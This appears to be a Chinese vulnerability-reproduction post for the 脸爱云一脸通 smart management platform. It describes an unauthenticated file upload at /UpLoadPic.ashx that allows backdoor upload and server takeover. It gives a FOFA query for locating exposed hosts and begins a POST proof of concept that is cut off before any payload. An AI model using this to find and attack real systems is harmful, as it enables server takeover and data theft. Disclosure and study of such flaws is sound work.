0x01 产品简介

脸爱云一脸通智慧管理平台是一套功能强大，运行稳定，操作简单方便，用户界面美观，轻松统计数据的一脸通系统。无需安装，只需在后台配置即可在浏览器登录。功能包括：系统管理中心、人员信息管理中心、设备管理中心、消费管理子系统、订餐管理子系统、水控管理子系统、电控管理子系统、考勤管理子系统、门禁通道管理子系统、会议签到管理子系统、访客管理子系统

0x02 漏洞概述

脸爱云一脸通智慧管理平台/UpLoadPic.ashx接口处存在文件上传漏洞，未经身份认证的攻击者可以通过此漏洞上传恶意后门文件，造成信息泄露和服务器接管（edu刷分神洞）

0x03 复现环境

FOFA：title=="欢迎使用脸爱云 一脸通智慧管理平台"

0x04 漏洞复现

PoC

POST /UpLoadPic.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWeb